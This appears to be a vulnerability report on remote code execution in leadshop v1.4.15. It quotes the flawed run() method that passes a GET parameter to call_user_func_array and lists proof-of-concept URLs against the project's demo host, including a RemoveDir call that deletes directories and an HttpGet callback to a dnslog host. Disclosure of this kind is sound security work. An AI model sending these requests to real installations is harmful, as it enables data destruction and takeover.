There is an RCE vulnerability in qmpaas/leadshop (https://github.com/qmpaas/leadshop) (v1.4.15). An attacker can access the file leadshop.php and call any existing function through GET to control the target host.
The vulnerability is in the leadshop/web/leadshop.php[27-61] file
public function run()
{
//读取参数数据
$include = isset($_GET['include']) ? $_GET['include'] : "";
$data = isset($_GET['data']) ? $_GET['data'] : "";
$meta = isset($_GET['meta']) ? $_GET['meta'] : "";
//执行数据方法
if ($include) {
return call_user_func_array([$this, $include], [$meta, $data]);
} else {
//用于判断是否非法操作
$token = isset($_GET['token']) ? $_GET['token'] : "";
$html = get_oss_url('index.html');
//判断锁文件是否存在,存在则是要执行更新
if (@file_exists(dirname(__DIR__) . "/install.lock")) {
if (@file_get_contents(dirname(__DIR__) . "/install.lock") === $token) {
if (!isset($_SESSION['self_update'])) {
//执行更新自身
$this->SilentSelfUpdate();
}
//执行更新操作
$version = get_version();
$body = $this->DownloadFile($html);
echo str_replace('{$version}', $version, $body);
} else {
die("检测到非法Token,请登录后台进入更新界面");
}
} else {
$version = get_version();
$body = $this->DownloadFile($html);
echo str_replace('{$version}', $version, $body);
}
}
}
https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn
),https://demo.leadshop.vip/leadshop.php?include=ToMkdir&meta=1
),https://demo.leadshop.vip/leadshop.php?include=UpdateSql
),https://demo.leadshop.vip/leadshop.php?include=DownloadFile&meta=www.baidu.com/img/flexible/logo/pc/peak-result.png
)poc: https://demo.leadshop.vip/leadshop.php?include=RemoveDir&meta=[path]
)Poc:
https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn
DNSLOG picture: